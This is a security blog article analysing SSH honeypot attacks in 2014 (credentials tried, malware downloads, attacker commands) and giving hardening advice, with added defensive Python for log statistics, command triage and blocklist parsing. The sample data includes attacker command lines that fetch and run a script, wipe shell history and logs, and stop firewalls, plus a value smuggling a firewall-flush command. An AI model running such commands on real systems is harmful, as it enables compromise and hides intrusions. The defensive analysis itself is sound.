
SSH honeypot for the detection of security incidents (II)

Posted on 01/13/2015, by Francisco J. Rodríguez (INCIBE)

In the previous article, "SSH honeypot for the detection of security incidents" [ES], we looked at a particular case: an attacker who gained access to the honeypot and, unlike the others, downloaded a list of valid usernames and passwords for SSH access to compromised devices such as routers and iPhones.

That has not been the only access recorded on the deployed SSH honeypots, however, and in this article we analyse the data collected during 2014.

Analysis and Geolocation of attacks

We treat any connection to port 22 of our honeypots as a possible attack: the SSH services have not been published anywhere, so any activity on them is considered suspicious. Note that this count therefore also includes untargeted Internet-wide scanners, not only attackers who go on to attempt a login.

Analysis of the recorded data gives the following results:

  • Over 30,000 connections to the exposed SSH services were recorded.
  • IP ranges whose addresses carry out the same type of attack were observed.
  • Almost 2,000 IP addresses from 72 different countries were involved.

- Top 20 origins of possible attacks (By countries) -

- Geographic representation of the origin of possible attacks (by coordinates) -

Detection of IP addresses on reputation lists

56% of the IP addresses were not present in any of the reputation lists consulted at the time of the analysis; in other words, blocking on reputation data alone would have missed more than half of the sources.

- Detection of the origin of attacks in IP reputation lists -

Types of attacks

The attacks received on our honeypots can be classified into the following types:

- Top 20 user/password combinations -

- Statistics of obtained and denied accesses -

  • Brute-force dictionary attacks: attempts to access the SSH service by trying user and password combinations automatically. Over 100,000 user/password combinations were recorded, of which 30% are unique. 9% of the attacking addresses eventually obtained a valid login. This percentage depends on how many user/password combinations the honeypot accepts as valid and on how many attempts are permitted before the IP is banned.
  • Malware download: automated attacks that, once inside, download malware onto the SSH server via wget or SFTP. Many attackers, after gaining access, first verify that the server offers SFTP; if it does not, they abandon the attack, suspecting a honeypot. Over 30,000 samples were downloaded, leading to the following conclusions:
    • A total of 330 unique attackers downloaded malware samples. Among the samples, shell scripts, ELF executables and uncompiled exploit source code stand out.
    • A large part of the analysed samples are the same malware with small variations, which yield a different hash for each copy. On this point, see the previously published "Variations of malware" article.
    • Some samples were not detected by any antivirus engine at the time of download.
    • The hosts from which attackers download the malware are not listed in the IP and URL reputation lists consulted. In every case, the malware distribution IPs were of Asian origin.
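As an added example (not code from the original article or from INCIBE's honeypots), the following Python script computes the figures discussed above and in the analysis section: connection and unique-IP counts, the share of unique user/password combinations, the per-attacker success rate and the top combinations. It runs over a few constructed log lines loosely modelled on the text log of the Kippo SSH honeypot; the format, the regexes and the addresses are assumptions to be adapted to the honeypot actually deployed.

```python
import re
from collections import Counter

# Constructed sample lines loosely modelled on the text log written by the Kippo SSH honeypot.
# They are illustrative only (not captured traffic); the regexes below assume this layout and
# must be adapted to the format of the honeypot actually deployed.
SAMPLE_LOG = """\
2014-03-02 10:15:00+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.5:51234 (10.0.0.2:2222) [session: 0]
2014-03-02 10:15:01+0000 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.5] login attempt [root/123456] failed
2014-03-02 10:15:02+0000 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.5] login attempt [root/password] failed
2014-03-02 10:15:03+0000 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.5] login attempt [root/123456] failed
2014-03-02 10:16:00+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.7:40001 (10.0.0.2:2222) [session: 1]
2014-03-02 10:16:01+0000 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [admin/admin] failed
2014-03-02 10:16:02+0000 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [root/123456] succeeded
2014-03-02 10:20:00+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.5:51300 (10.0.0.2:2222) [session: 2]
2014-03-02 10:20:01+0000 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.5] login attempt [root/toor] failed
2014-03-02 10:21:00+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 192.0.2.9:2222 (10.0.0.2:2222) [session: 3]
2014-03-02 10:21:01+0000 [SSHService ssh-userauth on HoneyPotTransport,3,192.0.2.9] login attempt [root/123456] succeeded
"""

CONN_RE = re.compile(r"New connection: (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+")
# A username containing "/" would be split wrongly by this pattern; Kippo logs do not quote it.
AUTH_RE = re.compile(
    r",\d+,(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\] login attempt "
    r"\[(?P<user>[^/]*)/(?P<pw>.*?)\] (?P<result>succeeded|failed)\s*$"
)


def analyse(log_text):
    """Aggregate connections, attacking IPs and login attempts from honeypot log text."""
    connections = 0
    ips = set()                 # every address seen, connecting or authenticating
    attempting_ips = set()      # addresses that tried at least one login
    successful_ips = set()      # addresses that obtained at least one accepted login
    attempts = Counter()        # (user, password) -> number of tries
    succeeded = failed = 0

    for line in log_text.splitlines():
        m = CONN_RE.search(line)
        if m:
            connections += 1
            ips.add(m.group("ip"))
            continue
        m = AUTH_RE.search(line)
        if not m:
            continue            # session output, downloads, etc. are not counted here
        ip = m.group("ip")
        ips.add(ip)
        attempting_ips.add(ip)
        attempts[(m.group("user"), m.group("pw"))] += 1
        if m.group("result") == "succeeded":
            succeeded += 1
            successful_ips.add(ip)
        else:
            failed += 1

    total = sum(attempts.values())
    return {
        "connections": connections,
        "unique_ips": len(ips),
        "attempts": total,
        "unique_combinations": len(attempts),
        # share of distinct user/password pairs among all tries (the article's 30%)
        "unique_combination_pct": round(100.0 * len(attempts) / total, 1) if total else 0.0,
        "succeeded": succeeded,
        "failed": failed,
        # share of attacking addresses that ended up with a valid login (the article's 9%)
        "attacker_success_pct": round(100.0 * len(successful_ips) / len(attempting_ips), 1)
        if attempting_ips else 0.0,
        "top_combinations": attempts.most_common(20),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for key, value in result.items():
        if key != "top_combinations":
            print(f"{key}: {value}")
    print("top user/password combinations:")
    for (user, pw), n in result["top_combinations"]:
        print(f"  {user}/{pw}: {n}")
```

The per-attacker success rate is computed over addresses, not over attempts, which is the measure that matters when deciding how many tries fail2ban should allow before banning: with the sample above, two of three attacking addresses get in because the honeypot accepts root/123456.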

SSH proxy

Attacks that use our honeypot as a proxy to earn pay-per-click revenue have also been detected: once in, the attacker visits hundreds of pages through the compromised host in order to inflate the click counts and, with them, his income.

Other cases

In this section we highlight those attackers that:

  • Carry out port scans.
  • Manage to authenticate and inspect the contents of the SSH server without carrying out any malicious activity.
  • Provide valid credentials for compromised servers: see the "SSH honeypot for the detection of security incidents" article.
  • Attempt, without authenticating, to download and execute malware that enrols the machine in a botnet.

Executed commands

The number of executed commands, both typed directly at the terminal and run from scripts, exceeds 3 million, of which only 1% are unique. Among them we highlight the following:

  • Removal of other malware already installed on the machine, followed by installation of the attacker's own.
  • Commands run to check whether the attacker is inside a honeypot.
  • Removal of evidence of the attack (clearing the shell history, cleaning logs, etc.).
  • Stopping firewalls.
  • Downloads via SFTP or wget.
  • Execution of malware that turns the machine into a bot.
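As an added example, not part of the original article, the following Python performs a first triage of the commands captured in one session along the lines listed above: it tags each command (honeypot checks, history and log cleaning, firewall stopping, downloads, killing competing malware, execution), counts the unique commands, and labels the session as a whole. The sample session, the category names and the patterns are assumptions, a starting point rather than a complete signature set.

```python
import re
from collections import Counter

# Categories and patterns are assumptions derived from the behaviour listed in the article;
# they are a starting point for triage, not an authoritative or complete signature set.
RULES = [
    ("honeypot_check", re.compile(
        r"^(uname\b|cat /proc/(cpuinfo|meminfo|version)|w\b|who\b|last\b|dmesg\b|lscpu\b|df\b|ls -la? /$)")),
    ("log_cleaning", re.compile(
        r"(history -c|unset HISTFILE|HISTFILE=/dev/null|HISTSIZE=0"
        r"|rm -rf? .*(\.bash_history|/var/log)|>\s*/var/log/(wtmp|btmp|lastlog|secure|auth\.log))")),
    ("firewall_stop", re.compile(
        r"(service (iptables|firewalld|ufw) stop|systemctl (stop|disable) (iptables|firewalld)"
        r"|iptables -F\b|ufw disable)")),
    ("download", re.compile(r"^(wget|curl|sftp|scp|tftp|ftp)\b")),
    ("kill_competitors", re.compile(r"^(pkill|killall|kill)\b")),
    ("execute", re.compile(r"(chmod \+?x|^nohup\b|^\./\S+|^perl\b|^python\b|^sh \S+|^bash \S+)")),
]

# Attackers chain commands with ";", "&&" and "||"; each piece is classified on its own.
# Single "|" pipes are kept together so that "cat /proc/cpuinfo | grep ..." stays one command.
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\|)\s*")

# Constructed sample session (not captured traffic); the host and script names are invented.
SAMPLE_SESSION = [
    "uname -a",
    "cat /proc/cpuinfo | grep name | wc -l",
    "w",
    "service iptables stop",
    "pkill -9 minerd",
    "cd /tmp && wget http://192.0.2.10/x.sh && chmod +x x.sh && ./x.sh",
    "history -c; unset HISTFILE",
    "rm -rf /var/log/wtmp",
    "uname -a",
]


def classify(command):
    """Return the set of categories matched by one command line (empty if none)."""
    cats = set()
    for part in SPLIT_RE.split(command.strip()):
        part = part.strip()
        if not part:
            continue
        for cat, rx in RULES:
            if rx.search(part):
                cats.add(cat)
    return cats


def analyse_session(commands):
    """Tag every command, count categories and unique commands, and label the session."""
    per_command = [(c, sorted(classify(c))) for c in commands]
    counter = Counter()
    for _, cats in per_command:
        counter.update(cats)            # one count per category per command
    cats = set(counter)
    if {"download", "execute"} <= cats:
        verdict = "bot_install"         # fetched something and ran it
    elif cats and cats <= {"honeypot_check"}:
        verdict = "recon_only"          # only looked around, as the article's cautious attackers do
    else:
        verdict = "other"
    return {
        "per_command": per_command,
        "categories": dict(counter),
        "unique_commands": len({c.strip() for c in commands}),
        "verdict": verdict,
    }


if __name__ == "__main__":
    result = analyse_session(SAMPLE_SESSION)
    for cmd, cats in result["per_command"]:
        print(f"{cats or ['-']}\t{cmd}")
    print("categories:", result["categories"])
    print("unique commands:", result["unique_commands"], "verdict:", result["verdict"])
```

Because the session label is derived from categories rather than from exact strings, the 99% of repeated commands mentioned above collapse into a handful of patterns, which is what makes the 3 million captured commands reviewable; new patterns show up as commands with no category and are the ones worth reading by hand.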

Conclusions and recommendations

Analysing the results leads to the conclusion that our Internet-facing services are exposed to a great number of attacks, and that it is important to harden them so that they are attacked as little as possible.

Using honeypots helps us detect new attackers, new patterns and attack trends, build IP reputation lists for our knowledge base, and capture new malware samples for later analysis. All this information helps us harden our services and obtain intelligence.

From the Security and Industry CERT operated by INCIBE we make the following recommendations for hardening SSH services:

  • Change the default SSH port. This only cuts the noise from untargeted scanners; a targeted attacker will find the service anyway, so it is no substitute for the measures below.
  • Disable root login (PermitRootLogin no in sshd_config).
  • Implement protection against brute-force attacks, such as fail2ban.
  • Use protocol version 2 only (Protocol 2).
  • Use strong passwords.
  • Use /etc/hosts.allow and /etc/hosts.deny to specify which addresses are permitted to connect and which are not. This requires an sshd built with TCP Wrappers support; recent OpenSSH releases have dropped it, in which case use firewall rules instead.

  • Use iptables to block addresses that have participated in attacks on SSH services, taken from IP reputation lists such as blocklist.de and openbl.org.
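As an added example, not code from the article, the following Python turns a downloaded reputation list into iptables rules for the last recommendation, applying the checks a practitioner wants before feeding an untrusted feed to the firewall: each line must parse as an IPv4 address or CIDR, entries inside private, loopback, multicast or reserved ranges (or in a caller-supplied trusted list, e.g. your own management network) are refused, duplicates are dropped, and the rules are built as argv lists so that no feed content ever reaches a shell. The list contents, the chain name SSH-BLOCK and the trusted network are constructed for illustration.

```python
import ipaddress

# Constructed sample in the one-entry-per-line style of public SSH blocklists; it is not real
# feed data. It deliberately contains a comment, a blank line, a CIDR, a duplicate, an RFC 1918
# address and two malformed lines, one of which looks like a shell-injection attempt.
SAMPLE_LIST = """\
# constructed sample, not a real feed
203.0.113.5
198.51.100.0/24

203.0.113.5
10.0.0.8
192.0.2.9
not-an-ip
203.0.113.5; iptables -F
"""

# Ranges a public reputation list should never make us block (loopback, RFC 1918, link-local,
# multicast, reserved); an entry overlapping any of them is treated as bad data.
NEVER_BLOCK = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4")]


def parse_reputation_list(text, trusted=()):
    """Return (accepted, rejected): accepted is a de-duplicated list of IPv4Network objects,
    rejected the raw lines that were discarded. `trusted` is a list of network strings that
    must never be blocked, for example the addresses you administer the host from."""
    protected = NEVER_BLOCK + [ipaddress.ip_network(t, strict=False) for t in trusted]
    accepted, rejected, seen = [], [], set()
    for raw in text.splitlines():
        entry = raw.split("#", 1)[0].strip()        # drop comments and surrounding whitespace
        if not entry:
            continue
        try:
            net = ipaddress.ip_network(entry, strict=False)   # "a.b.c.d" becomes a /32
        except ValueError:
            rejected.append(raw)                    # not an address or CIDR: never trust it
            continue
        if net.version != 4 or any(net.overlaps(p) for p in protected):
            rejected.append(raw)                    # would lock us out or block nothing useful
            continue
        if net not in seen:
            seen.add(net)
            accepted.append(net)
    return accepted, rejected


def iptables_rules(networks, ssh_port=22, chain="SSH-BLOCK"):
    """Build the iptables invocations as argv lists, to be run with subprocess without a shell.
    A dedicated chain keeps the feed separate from hand-written rules and is easy to flush
    when the list is refreshed."""
    rules = [
        ["iptables", "-N", chain],                  # fails harmlessly if the chain already exists
        ["iptables", "-I", "INPUT", "-p", "tcp", "--dport", str(ssh_port), "-j", chain],
    ]
    for net in networks:
        rules.append(["iptables", "-A", chain, "-s", net.with_prefixlen, "-j", "DROP"])
    rules.append(["iptables", "-A", chain, "-j", "RETURN"])
    return rules


def render(rules):
    """Render the argv lists as shell lines for review; only the validated addresses appear."""
    return "\n".join(" ".join(rule) for rule in rules)


if __name__ == "__main__":
    accepted, rejected = parse_reputation_list(SAMPLE_LIST, trusted=["192.0.2.0/24"])
    print("rejected lines:", rejected)
    print(render(iptables_rules(accepted)))
```

For lists the size of blocklist.de's (tens of thousands of entries) one DROP rule per address makes the INPUT chain slow to traverse; the same validated networks are better loaded into an ipset of type hash:net and matched with a single `-m set` rule, but the parsing and the refusal of private and malformed entries stay exactly as above.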